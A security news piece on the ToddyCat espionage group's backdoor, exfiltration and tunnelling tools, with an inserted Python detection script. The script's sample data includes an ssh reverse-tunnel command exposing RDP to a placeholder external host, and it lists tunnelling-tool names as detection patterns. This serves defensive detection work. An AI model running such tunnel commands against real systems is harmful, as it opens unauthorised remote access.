ToddyCat: Hackers tightly targeted Asian governments

Father

Once the Samurai backdoor is in place, victims have little chance of keeping their data safe.

Experts from Kaspersky Lab have found that the ToddyCat hacking group uses a wide range of tools to maintain access to compromised systems and steal valuable data. The group, active since December 2020, mainly targets government and defense organizations in the Asia-Pacific region.

The group's primary tool is Samurai, a passive backdoor that lets the attackers remotely control infected hosts. According to researchers Andrey Gunkin, Alexander Fedotov and Natalia Shornikova, the attackers have automated collection as far as possible in order to harvest data from a large number of hosts, and they keep several alternative channels open so that they can continuously access and monitor compromised systems.

Alongside Samurai, ToddyCat deploys dedicated exfiltration tools such as LoFiSe and Pcexter, which gather files and upload the resulting archives to Microsoft OneDrive. The group also relies on a set of tunneling, proxying and data-collection utilities:
  • A reverse SSH tunnel built with OpenSSH;
  • SoftEther VPN disguised as innocuous-looking files such as "boot.exe", "mstime.exe", "netscan.exe" and "kaspersky.exe";
  • Ngrok and Krong to encrypt and redirect command-and-control traffic;
  • FRP, a fast reverse proxy client written in Go;
  • Cuthead, a .NET executable that searches for documents by extension, name or modification date;
  • WAExp, a .NET program that captures data from the WhatsApp web app and stores it in an archive;
  • TomBerBil, which extracts cookies and credentials from web browsers, including Google Chrome and Microsoft Edge.

These tools let the attackers keep several simultaneous connections open between infected endpoints and their own infrastructure, which acts as a fallback for retaining access if one of the channels is detected and blocked.
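A small detection routine for the tunneling tradecraft listed above, added here as an example; it is not code from Kaspersky and not part of the ToddyCat toolset. It takes simplified process-creation records (field names modelled on Sysmon Event ID 1: Image, OriginalFileName, CommandLine; that mapping is an assumption) and flags a SoftEther binary running under one of the lure file names, an OpenSSH client started with a remote forward (-R), and the ngrok and FRP clients by name. The SoftEther original file names and the sample events are assumptions constructed for the example, not telemetry from the report.

```python
"""Flag process-creation events that look like ToddyCat-style tunnelling tools.

Added example, not Kaspersky's or the group's code. Field names follow a
simplified Sysmon Event ID 1 record (assumption); sample events are constructed.
"""
import re
from dataclasses import dataclass

# File names the report says a disguised SoftEther VPN binary was given.
DISGUISED_NAMES = {"boot.exe", "mstime.exe", "netscan.exe", "kaspersky.exe"}
# Assumed PE OriginalFileName values of the SoftEther server/bridge binaries
# (not taken from the report).
SOFTETHER_ORIGINALS = {"vpnserver.exe", "vpnserver_x64.exe", "vpnbridge.exe"}
# Tunnelling clients named in the report; frpc is the FRP client binary.
TUNNEL_CLIENTS = {"ngrok.exe", "ngrok", "frpc.exe", "frpc"}
# An ssh remote forward: "-R 2222:...", "-R2222:..." or bundled flags like "-fNR".
REVERSE_FWD_FLAG = re.compile(r"\s-[A-Za-z]*R(?=\s|\d)")


@dataclass
class ProcEvent:
    image: str               # full path of the started executable
    original_file_name: str  # PE OriginalFileName as the sensor records it
    command_line: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the list of suspicious traits seen in one event (empty if none)."""
    findings = []
    name = _basename(ev.image)
    orig = ev.original_file_name.lower()

    # 1. A SoftEther binary whose on-disk name differs from its PE original name.
    if orig in SOFTETHER_ORIGINALS and name != orig:
        findings.append(f"softether-renamed:{name}")
    # 2. One of the same lure names used by some other renamed binary.
    elif name in DISGUISED_NAMES and orig and name != orig:
        findings.append(f"disguised-name:{name}<-{orig}")

    # 3. OpenSSH client opening a reverse tunnel (-R or RemoteForward=).
    if name in ("ssh", "ssh.exe") and (
        REVERSE_FWD_FLAG.search(ev.command_line)
        or "remoteforward=" in ev.command_line.lower()
    ):
        findings.append("reverse-ssh-tunnel")

    # 4. Known tunnelling clients, by on-disk or original name.
    if name in TUNNEL_CLIENTS or orig in TUNNEL_CLIENTS:
        findings.append(f"tunnel-client:{orig or name}")

    return findings


def scan(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """Return (image, findings) for every event that raised at least one finding."""
    return [(ev.image, f) for ev in events if (f := classify(ev))]


# Constructed sample telemetry, not real events.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\Temp\kaspersky.exe", "vpnserver_x64.exe",
              "kaspersky.exe /start"),
    ProcEvent(r"C:\Program Files\OpenSSH\ssh.exe", "ssh.exe",
              "ssh.exe -fN -R 2222:127.0.0.1:3389 -p 443 ops@203.0.113.7"),
    ProcEvent(r"C:\Users\Public\frpc.exe", "frpc.exe", "frpc.exe -c frpc.ini"),
    ProcEvent(r"C:\Program Files\OpenSSH\ssh.exe", "ssh.exe",
              "ssh.exe -p 22 admin@10.0.0.5"),            # benign interactive ssh
    ProcEvent(r"C:\Windows\System32\notepad.exe", "NOTEPAD.EXE",
              "notepad.exe report.txt"),                  # benign
]

if __name__ == "__main__":
    for image, findings in scan(SAMPLE_EVENTS):
        print(image, "->", ", ".join(findings))
```

OriginalFileName is metadata an attacker can strip when rebuilding the binary, so treat the renamed-SoftEther check as one signal among several; the reverse-forward and client-name checks still fire on the command line and file name, and all three are cheap to run over existing endpoint logs.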

To protect their infrastructure, Kaspersky Lab advises organizations to add the hosts and IP addresses of cloud services that provide traffic tunneling to their firewall block lists. It also recommends not saving passwords in browsers, so that attackers who compromise a host cannot harvest them.